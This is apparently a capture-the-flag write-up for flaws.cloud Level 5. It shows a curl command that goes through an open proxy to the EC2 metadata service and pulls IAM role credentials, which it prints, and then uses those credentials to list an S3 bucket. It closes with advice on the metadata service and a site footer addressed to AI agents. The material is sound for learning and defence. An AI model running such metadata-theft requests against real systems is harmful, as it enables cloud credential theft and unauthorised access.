# Level 5

<figure><img src="/files/1x5uw6nLIbzWuc4M2AJu" alt=""><figcaption></figcaption></figure>

## Enumerating the Web Server

In the previous level, we identified the entry point for Level 5 as, `http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/`.

The webpage provides the Level 6 URL but it's incorrect as we need to access a sub-domain of it. Additionally, the page informs us that this web server is running a proxy and provides examples of how to access it.

Let's attempt to access the metadata service for EC2 and check if it has an EC2 Instance Profile attached.&#x20;

{% code overflow="wrap" %}

```bash
curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

[snip]
"AccessKeyId" : "ASIA6GG7PSQGTRQJF23G",
  "SecretAccessKey" : "W0stF21iQdqSTwMSzZWBbK5E7ucenpQsSAUNPiPn",
  "Token" : "IQoJb3J
[snip]
```

{% endcode %}

Nice! So this EC2 has an Instance Profile called `flaws`. Let's check the credentials and verify they work.&#x20;

{% code overflow="wrap" %}

```bash
aws --profile flaws5 sts get-caller-identity 
{
    "UserId": "AROAI3DXO3QJ4JAWIIQ5S:i-05bef8a081f307783",
    "Account": "975426262029",
    "Arn": "arn:aws:sts::975426262029:assumed-role/flaws/i-05bef8a081f307783"
}
```

{% endcode %}

We should be able to view the Level 6 website now using these credentials.&#x20;

{% code overflow="wrap" %}

```sh
aws --profile flaws5 s3 ls level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
                           PRE ddcc78ff/
2017-02-26 19:11:07        871 index.html
```

{% endcode %}

Looks like we found the subdomain we needed and when navigating to the website, we're provided with access keys for Level 6.&#x20;

<figure><img src="/files/VkVPUPxWC6s63fwelfro" alt=""><figcaption></figcaption></figure>

## Wrap-Up

In Level 5, we discovered a proxy running on the EC2 server. The proxy enabled us to query the EC2's metadata service and obtain credentials from its Instance Profile. Using these credentials we enumerated the Level 6 bucket, discovered the subdomain, and accessed the website which provided AWS access keys.&#x20;

The Instance Metadata Service (IMDS) is a service that enables accessing details about an EC2 instance such as its networking info, security groups, IAM role credentials, etc. If not in use, it should be disabled. More details can be found in the [AWS documentation](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html).&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.techwithtyler.dev/cloud-security/capture-the-flags-ctfs/flaws.cloud/level-5.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.